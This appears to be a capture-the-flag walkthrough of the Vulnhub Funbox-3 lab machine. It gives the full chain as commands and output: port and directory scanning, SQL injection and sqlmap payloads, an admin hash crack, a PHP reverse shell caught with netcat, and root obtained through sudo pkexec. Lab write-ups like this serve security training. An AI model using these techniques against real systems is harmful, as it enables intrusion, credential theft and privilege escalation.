Vulnhub: Funbox-3
It is the third box in the Funbox series. The Funbox series from Vulnhub is a great series for beginners. This box has a great flow, and alot rabbit holes.
Looking back, I really didn’t explain my steps here at all, yikes!
Scanning:
crazyeights@es-base:~$ nmap -PS 192.168.56.1-255
Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-12 21:54 EDT
Nmap scan report for 192.168.56.118
Host is up (0.000084s latency).
Not shown: 998 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
More Thorough Scanning:
crazyeights@es-base:~$ nmap -A -p- 192.168.56.118
Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-12 21:55 EDT
[SNIP]
Not shown: 65532 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_gym
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
33060/tcp open mysqlx?
[SNIP]
Web Enumeration:
index is apache2 default page
Scanning with dirb:
crazyeights@es-base:~$ dirb http://192.168.56.118
[SNIP]
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.56.118/ ----
==> DIRECTORY: http://192.168.56.118/admin/
+ http://192.168.56.118/index.html (CODE:200|SIZE:10918)
+ http://192.168.56.118/index.php (CODE:200|SIZE:3468)
+ http://192.168.56.118/robots.txt (CODE:200|SIZE:14)
==> DIRECTORY: http://192.168.56.118/secret/
+ http://192.168.56.118/server-status (CODE:403|SIZE:279)
==> DIRECTORY: http://192.168.56.118/store/
---- Entering directory: http://192.168.56.118/admin/ ----
==> DIRECTORY: http://192.168.56.118/admin/assets/
+ http://192.168.56.118/admin/index.php (CODE:200|SIZE:3263)
---- Entering directory: http://192.168.56.118/secret/ ----
+ http://192.168.56.118/secret/index.php (CODE:200|SIZE:108)
+ http://192.168.56.118/secret/robots.txt (CODE:200|SIZE:35)
---- Entering directory: http://192.168.56.118/store/ ----
+ http://192.168.56.118/store/admin.php (CODE:200|SIZE:3153)
[SNIP]
Checking the secret directory:
crazyeights@es-base:~$ curl http://192.168.56.118/secret/
„Anyone who lives within their means suffers from a lack of imagination.“
Oscar Wilde (*1854 - †1900)
-
there are several sites on the server a store, a gym page, and a project management site (?)
-
Started with the book store because it looks like it has the most content (without having to login)
Book store:
-
at /store
-
book product pages look vulnerable to SQLi
-
Trying:
http://192.168.56.118/store/book.php?bookisbn=978-0-321-94786-4 or '1'='1
Response is:
Can't retrieve data You have an error in your SQL syntax;
check the manual that corresponds to your MySQL server version for the right syntax to use near '1'='1'' at line 1
Using sqlmap to dump database:
crazyeights@es-base:~$ sqlmap -u http://192.168.56.118/store/book.php?bookisbn=978-0-321-94786-4 --dump
[SNIP]
sqlmap identified the following injection point(s) with a total of 59 HTTP(s) requests:
---
Parameter: bookisbn (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: bookisbn=978-0-321-94786-4' AND 2942=2942 AND 'uGAX'='uGAX
Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: bookisbn=978-0-321-94786-4' AND GTID_SUBSET(CONCAT(0x71707a7871,(SELECT (ELT(2352=2352,1))),0x71767a7071),2352) AND 'Dlzl'='Dlzl
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: bookisbn=978-0-321-94786-4' AND (SELECT 5367 FROM (SELECT(SLEEP(5)))ObXO) AND 'PTKg'='PTKg
Type: UNION query
Title: Generic UNION query (NULL) - 7 columns
Payload: bookisbn=-5080' UNION ALL SELECT NULL,NULL,CONCAT(0x71707a7871,0x59626b6e544b464b4c655250796a466c6e716b6f706f68696b7154676d6f485975546b7a656c7175,0x71767a7071),NULL,NULL,NULL,NULL-- -
---
[SNIP]
Cracking admin hash with sqlmap:
Database: store
Table: admin
[1 entry]
+-------+--------------------------------------------------+
| name | pass |
+-------+--------------------------------------------------+
| admin | d033e22ae348aeb5660fc2140aec35850c4da997 (admin) |
+-------+--------------------------------------------------+
Logging in as admin:
-
at /store/admin.php with credentials admin:admin
-
As admin you can upload images for book covers - it doesn’t seem to limit you to just images
-
Will try to upload a php reverse shell
images are stored:
http://192.168.56.118/store/bootstrap/img/
-
It would appear that the backend of this site doesn’t actually do anything.
-
It just takes a few minutes the file to upload for some reason
-
Start netcat:
nc -lvp 1234
Click on php-reverse-shell.php
crazyeights@es-base:~$ nc -lvp 1234
listening on [any] 1234 ...
192.168.56.118: inverse host lookup failed: Unknown host
connect to [192.168.56.1] from (UNKNOWN) [192.168.56.118] 55336
Linux funbox3 5.4.0-42-generic #46-Ubuntu SMP Fri Jul 10 00:24:02 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
02:38:01 up 44 min, 0 users, load average: 0.00, 0.01, 0.12
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ ls
$ cd /home
$ ls
tony
$ cd tony
$ ls
password.txt
$ cat password.txt
ssh: yxcvbnmYYY
gym/admin: asdfghjklXXX
/store: admin@admin.com admin
$
-
the gym site actually did something, huh…
-
The SSH password for tony is in the password file
Logging into SSH as tony:
tony:yxcvbnmYYY
crazyeights@es-base:~$ ssh tony@192.168.56.118
tony@192.168.56.118's password:
Welcome to Ubuntu 20.04 LTS (GNU/Linux 5.4.0-42-generic x86_64)
[SNIP]
tony@funbox3:~$
Checking html directory:
I have no idea what the rest of this is for, so many rabbit holes…
tony@funbox3:~$ cd /var/www/html
tony@funbox3:/var/www/html$ ls
admin gym logout.php
change-password.php header.php profile.php
checklogin.php hitcounter.txt registration.php
create-ticket.php index.html robots.txt
dashboard.php index.php secret
dbconnection.php jquery-1.2.6.min.js store
forgot-password.php jquery.timers-1.0.0.js view-tickets.php
get-quote.php leftbar.php
Priv Esc:
Finding commands tony can run with elevated privileges:
tony@funbox3:/var/www/html$ sudo -l
Matching Defaults entries for tony on funbox3:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User tony may run the following commands on funbox3:
(root) NOPASSWD: /usr/bin/yelp
(root) NOPASSWD: /usr/bin/dmf
(root) NOPASSWD: /usr/bin/whois
(root) NOPASSWD: /usr/bin/rlogin
(root) NOPASSWD: /usr/bin/pkexec
(root) NOPASSWD: /usr/bin/mtr
(root) NOPASSWD: /usr/bin/finger
(root) NOPASSWD: /usr/bin/time
(root) NOPASSWD: /usr/bin/cancel
(root) NOPASSWD:
/root/a/b/c/d/e/f/g/h/i/j/k/l/m/n/o/q/r/s/t/u/v/w/x/y/z/.smile.sh
Interesting:
pkexec - Execute a command as another user
Testing it out:
tony@funbox3:~$ sudo pkexec --user root /usr/bin/ls /root
root.flag snap
Getting root:
tony@funbox3:~$ sudo pkexec --user root /bin/bash -i
root@funbox3:~#
Getting the root flag:
root@funbox3:~# cd /root
root@funbox3:~# ls
root.flag snap
root@funbox3:~# cat root.flag
__________ ___. ___________
\_ _____/_ __ ____\_ |__ _______ ___ /\ \_ _____/____ _________.__.
| __)| | \/ \| __ \ / _ \ \/ / \/ | __)_\__ \ / ___< | |
| \ | | / | \ \_\ ( <_> > < /\ | \/ __ \_\___ \ \___ |
\___ / |____/|___| /___ /\____/__/\_ \ \/ /_______ (____ /____ >/ ____|
\/ \/ \/ \/ \/ \/ \/ \/
Made with ❤ from twitter@0815R2d2. Please, share this on twitter if you want.
root@funbox3:~#
this one was awesome. just the right level of easy to you feel like a boss while doing it. 10/10
FIN.